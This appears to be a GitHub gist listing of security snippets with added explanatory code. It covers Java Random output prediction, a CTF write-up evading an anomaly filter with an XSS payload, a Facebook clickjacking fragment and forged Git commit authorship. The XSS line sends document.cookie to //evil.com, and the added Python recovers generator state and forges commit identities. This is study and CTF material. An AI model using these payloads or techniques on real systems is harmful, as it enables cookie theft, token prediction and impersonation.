@0xBADCA7
0xBADCA7 / predict_java_random_seed.java
Created February 3, 2014 10:05
Java's Random PRG "seed" prediction. Ideone ready.
/* package whatever; // don't place package name! */
import java.util.*;
import java.lang.*;
import java.io.*;
/* Name of the class has to be "Main" only if the class is public. */
class Ideone
{
    private static long multiplier = 0x5DEECE66DL;
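The preview above stops at the LCG multiplier, so here is an added worked example (my own code, not the gist's) that ports java.util.Random to Python and recovers the hidden generator state from consecutive nextInt() outputs. The constants 0x5DEECE66D, 0xB and the 48-bit mask are java.util.Random's own; the class and function names, the clock-seeded "victim" and the sample outputs are assumptions made for the demonstration.

```python
MULTIPLIER = 0x5DEECE66D   # java.util.Random's LCG multiplier (the constant the gist starts with)
ADDEND = 0xB
MASK = (1 << 48) - 1       # the generator state is 48 bits wide


def to_signed32(x: int) -> int:
    """Reinterpret the low 32 bits of x as a Java int."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x


class JavaRandom:
    """Python port of java.util.Random: setSeed(), next(32) and nextInt()."""

    def __init__(self, seed: int):
        self.state = (seed ^ MULTIPLIER) & MASK   # initialScramble()

    @classmethod
    def from_state(cls, state: int) -> "JavaRandom":
        """Build a generator from a raw 48-bit state (what the attacker recovers)."""
        rng = cls.__new__(cls)
        rng.state = state & MASK
        return rng

    def next_int(self) -> int:
        self.state = (self.state * MULTIPLIER + ADDEND) & MASK
        return to_signed32(self.state >> 16)       # next(32): the top 32 of the 48 state bits


def recover_state(outputs):
    """Recover the full 48-bit state from consecutive nextInt() outputs.

    Each output leaks the upper 32 bits of the state that produced it, so only the low
    16 bits are unknown: 65536 candidates. Every candidate is stepped forward and must
    reproduce each later output; extra outputs make a false match less likely.
    Returns the state after the last output, or None if the outputs are not consecutive."""
    if len(outputs) < 2:
        raise ValueError("need at least two consecutive outputs")
    high_bits = (outputs[0] & 0xFFFFFFFF) << 16
    for low_bits in range(1 << 16):
        state = high_bits | low_bits
        for expected in outputs[1:]:
            state = (state * MULTIPLIER + ADDEND) & MASK
            if (state >> 16) != (expected & 0xFFFFFFFF):
                break
        else:
            return state
    return None


def predict_next(outputs, count: int = 1):
    """Predict the next `count` nextInt() values after the observed ones."""
    state = recover_state(outputs)
    if state is None:
        raise ValueError("outputs are not consecutive java.util.Random.nextInt() values")
    clone = JavaRandom.from_state(state)
    return [clone.next_int() for _ in range(count)]


if __name__ == "__main__":
    import time
    # constructed victim: seeded from the clock, as a careless application might do
    victim = JavaRandom(int(time.time() * 1000))
    observed = [victim.next_int() for _ in range(2)]
    print("observed:  ", observed)
    print("predicted: ", predict_next(observed, 3))
    print("actual:    ", [victim.next_int() for _ in range(3)])
```

nextInt() hands out the whole 32-bit slice of the state, which is why two outputs are enough. nextLong() concatenates two next(32) calls and nextDouble() uses next(26) and next(27), so for those methods the candidate check has to mirror the target's call sequence; the seed itself is never needed, only the state. SecureRandom is the fix for anything security-relevant.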
0xBADCA7 / Anomaly
Created May 26, 2014 17:31 — forked from ngo/Anomaly
In this task we had to bypass a badly-trained anomaly detection algorithm and perform an XSS attack.
We didn't have to figure out exactly how the anomaly detection worked; it was enough to understand that the anomaly scoring was based on the density of the "bad" (i.e. non-alphanumeric) chars in the payload. Thus, the solution was to dissolve the attack payload in a lot of benign symbols ([AxN] represents a string of N A's):
anomaly.php?name=[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]+onerror=src%2b=document.cookie+[Ax1000]+/>
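As an added illustration (my code, not part of ngo's or 0xBADCA7's writeup), the Python below models a density-based scorer like the one described, expands the writeup's [AxN] shorthand into the value anomaly.php would receive, computes how much filler the undiluted payload needs, and checks with Python's own HTML parser that the diluted markup still yields a video element carrying the src and onerror attributes. The real anomaly.php is not on the page, so the scorer and its threshold are assumptions chosen only to reproduce the behaviour the writeup describes.

```python
import math
import re
from html.parser import HTMLParser
from urllib.parse import unquote_plus

# Assumed scorer: the challenge's real model and threshold are unknown; this value is
# only there to make the effect visible.
THRESHOLD = 0.05

# The request value from the writeup, in its [AxN] shorthand.
WRITEUP_VALUE = ("[Ax600]%3Cvideo+[Ax300]+src=//evil.com+[Ax300]"
                 "+onerror=src%2b=document.cookie+[Ax1000]+/>")


def expand(template: str) -> str:
    """Expand [AxN] into N 'A's and URL-decode: what anomaly.php sees in $_GET['name']."""
    expanded = re.sub(r"\[Ax(\d+)\]", lambda m: "A" * int(m.group(1)), template)
    return unquote_plus(expanded)


def undiluted_attack() -> str:
    """The same payload with every padding run removed."""
    return unquote_plus(re.sub(r"\[Ax\d+\]", "", WRITEUP_VALUE))


def bad_char_density(value: str) -> float:
    """Share of non-alphanumeric ('bad') characters, the feature the writeup says was scored."""
    if not value:
        return 0.0
    return sum(1 for c in value if not c.isalnum()) / len(value)


def is_flagged(value: str, threshold: float = THRESHOLD) -> bool:
    return bad_char_density(value) > threshold


def benign_padding_needed(value: str, threshold: float = THRESHOLD) -> int:
    """Fewest alphanumeric filler characters that push the density to or below the threshold."""
    bad = sum(1 for c in value if not c.isalnum())
    # bad / (len(value) + n) <= threshold  <=>  n >= bad / threshold - len(value)
    n = max(0, math.ceil(bad / threshold) - len(value))
    while bad_char_density(value + "A" * n) > threshold:          # guard against float rounding up
        n += 1
    while n > 0 and bad_char_density(value + "A" * (n - 1)) <= threshold:   # and rounding down
        n -= 1
    return n


class VideoTagProbe(HTMLParser):
    """Collects the attributes that survive on the injected <video> element after parsing."""

    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "video":
            # the A-runs parse as valueless attributes (value None) and are harmless; keep the real ones
            self.attrs = {name: value for name, value in attrs if value is not None}

    handle_startendtag = handle_starttag   # the payload ends with '/>'


def surviving_attrs(markup: str) -> dict:
    probe = VideoTagProbe()
    probe.feed(markup)
    probe.close()
    return probe.attrs


if __name__ == "__main__":
    raw, diluted = undiluted_attack(), expand(WRITEUP_VALUE)
    print(f"raw:     density={bad_char_density(raw):.3f} flagged={is_flagged(raw)}")
    print(f"diluted: density={bad_char_density(diluted):.3f} flagged={is_flagged(diluted)}")
    print("minimum padding for the raw payload:", benign_padding_needed(raw))
    print("attributes the parser keeps:", surviving_attrs(diluted))
```

The point the parser check makes is that the filler is not free-form: it has to land where HTML tolerates junk (between attributes), so each run becomes an attribute name the browser ignores while src and onerror come through untouched. A scorer that normalises the value first (decoding, collapsing repeated characters, or scoring per token instead of per character) would not be fooled this way.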
#!/usr/bin/env python
# Reflects the requests from HTTP methods GET, POST, PUT, and DELETE
# Written by Nathan Hamiel (2010)
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from optparse import OptionParser
class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
// this is for the iframe to facebook.com
document.domain = 'facebook.com'
uid = 501558012;
app_id = 123456789012332;
function Image(){
    // this should kill the click jacking report
}
// create a new iframe we will use to load facebook.com
# Original castealer.rb with analysis
#####################################################################################
require 'rubygems' #redundant
require 'openssl'
require 'digest/md5' #redundant
key = OpenSSL::PKey::RSA.new(2048)
cipher = OpenSSL::Cipher::AES.new(256, :CBC) #redundant
ctx = OpenSSL::SSL::SSLContext.new #redundant
<html lang="en">
<head>
<script>
function str2hex(str)
{
    var out_str = " ";
    for(var i = 0; i < str.length; i++)
    {
0xBADCA7 / gist:26ac0c9fb25fa7e8475e
Created January 3, 2015 16:13
Pwn your pal using Github

Bringing back an old Github "feature" (bug) that can easily set any Github user up

Intro

It all started when I was browsing the sources of one of the apps in our organization on Github. I must say I love browsing code on Github - syntax highlighting, line comments, swift loading, a lot of goodness, etc. However, one file listing left me profoundly distracted and confused... The code was mine according to GH, but I knew for sure it looked nothing like my code. Just that small patch left me pondering for a while, as I was sure it just couldn't be my code, so I started digging it all up to the surface.

First of all, I didn't see any suspicious activity on my profile page. Nothing off in the Git history either. The commit bore my name and email. It was a while ago - back when we were not signing our commits (nowadays we certainly do!) within the organization.

Old "feature"

Then I realized that Github will surely allow any email and name go through once set up via git config user.name and `git config user.e
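The mechanism behind this rests on one fact: the author and committer lines of a commit are free text that git never authenticates, and a forge that keys attribution on the e-mail address credits whoever owns that address. The Python below is an added illustration, not the author's code: it serialises a commit object the way git does (the object id is SHA-1 over "commit <size>\0" plus the body) with a chosen name and e-mail, parses the identity back out as a forge would, and checks for a gpgsig header, which is the only thing in the object that can bind it to a key. The victim and attacker names, e-mail addresses, timestamp and message are constructed; the empty-tree id, the empty-blob id and the object-id formula are git's.

```python
import hashlib
import re

EMPTY_TREE = "4b825dc642cb6eb9a060e54bf8d69288fbee4904"   # git's id for the empty tree


def git_object_id(obj_type: str, payload: bytes) -> str:
    """Object id exactly as git computes it: SHA-1 over "<type> <size>\\0" followed by the body."""
    header = f"{obj_type} {len(payload)}\0".encode()
    return hashlib.sha1(header + payload).hexdigest()


def build_commit(tree: str, parents, author, committer, message: str,
                 timestamp: int = 1420300380, tz: str = "+0000"):
    """Serialise a commit object.

    author and committer are (name, email) tuples. Nothing here is checked against anything:
    whatever `git config user.name` / `user.email` say (or whatever you type) lands in the
    object, and that text is all a forge has to go on when it attributes the commit."""
    lines = [f"tree {tree}"] + [f"parent {p}" for p in parents]
    lines.append(f"author {author[0]} <{author[1]}> {timestamp} {tz}")
    lines.append(f"committer {committer[0]} <{committer[1]}> {timestamp} {tz}")
    payload = ("\n".join(lines) + "\n\n" + message + "\n").encode()
    return git_object_id("commit", payload), payload


IDENT_RE = re.compile(r"(author|committer) (.*) <([^>]*)> (\d+) ([+-]\d{4})")


def commit_identities(payload: bytes) -> dict:
    """Read the identities back out of a commit object, as a forge does when attributing it."""
    headers = payload.decode().split("\n\n", 1)[0]
    found = {}
    for line in headers.split("\n"):
        m = IDENT_RE.fullmatch(line)
        if m:
            found[m.group(1)] = {"name": m.group(2), "email": m.group(3)}
    return found


def has_signature(payload: bytes) -> bool:
    """True if the object carries a gpgsig header. Presence alone proves nothing: the signature
    still has to verify against a key the forge has bound to the account owning the e-mail."""
    headers = payload.decode().split("\n\n", 1)[0]
    return any(line.startswith("gpgsig ") for line in headers.split("\n"))


if __name__ == "__main__":
    # constructed identities: the victim's name and e-mail are simply what the attacker puts in git config
    victim = ("Victim Name", "victim@example.com")
    attacker = ("Attacker", "attacker@example.com")
    forged_id, forged = build_commit(EMPTY_TREE, [], victim, victim, "refactor: definitely the victim's work")
    honest_id, honest = build_commit(EMPTY_TREE, [], attacker, attacker, "refactor: definitely the victim's work")
    print(forged_id, commit_identities(forged)["author"])
    print(honest_id, commit_identities(honest)["author"])
    print("forged commit carries a signature:", has_signature(forged))
```

The two objects differ only in the identity text and therefore in their ids; both are perfectly valid commits that any remote will accept on push. That is why commit signing, and a branch rule that rejects unsigned commits, is the control that actually closes this, not anything the name or e-mail field can carry.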

##
## WPS on OpenWRT
## This script enables Wi-Fi Protected Setup on OpenWRT.
##
## Resources
## http://wiki.openwrt.org/doc/uci/wireless#wps.options
##
#Install the full wpad package
opkg update
define xac
  dont-repeat
  set $addr = (char *)($arg0)
  set $endaddr = $addr + $arg1
  while $addr < $endaddr
    printf "%p: ", $addr
    set $lineendaddr = $addr + 8
    if $lineendaddr > $endaddr
      set $lineendaddr = $endaddr
    end
0xBADCA7 / ssl_server.py
Created May 21, 2015 19:09
Simple HTTPS server in Python 3
#!/usr/bin/env python3
from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl

# SimpleHTTPRequestHandler serves the current working directory
httpd = HTTPServer(('localhost', 1443), SimpleHTTPRequestHandler)
# ssl.wrap_socket() was deprecated in Python 3.7 and removed in 3.12; use an SSLContext,
# which also lets us refuse anything older than TLS 1.2
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.minimum_version = ssl.TLSVersion.TLSv1_2
context.load_cert_chain(certfile='certificate.pem', keyfile='privatekey.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()